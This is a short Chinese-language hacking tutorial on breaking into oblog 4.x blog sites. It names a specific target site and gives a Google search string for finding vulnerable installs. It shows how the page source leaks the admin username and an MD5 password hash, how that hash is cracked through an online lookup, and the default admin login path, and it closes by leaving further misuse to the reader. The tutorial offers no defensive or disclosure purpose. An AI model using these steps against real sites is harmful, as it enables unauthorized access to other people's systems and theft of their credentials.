菜鸟教程 ~ by QQ:71171709
oblog是比较出名的博客系统,使用人数很多
这个漏洞适合4.x版本
首先,我们在GOOGLE里面输入以下关键字
Copyright by oblog.cn
出来一大堆关于OBLOG的内容 。随便选取个站点。
为了节省大家时间,我试先找好了一个站点,,http://www.9cun.cn
有漏洞的BLOG会出现以下字符
document.write('
');
我们在这个页面查看源代码
document.write('<ul><li><a href="http://www.9cun.cn/group.asp?gid=admin&pid=469e80d32c0559f8" target="_blank"></a></li></ul>');
会看到类似这样的信息,
其中
admin 这个是用户名
469e80d32c0559f8 这个就是admin的密码,只是经过md5加密的
接下来去收集MD5的网站查下就知了。
输进去,就可以得到解密后的正确密码了
查询结果:
admin888
接下来就后台,
成功登陆了
OBLOG的默认后台路径为 http://域名/admin/admin_login.asp
接下来可以做什么,,大家自己发挥了。
教程结束。谢谢 。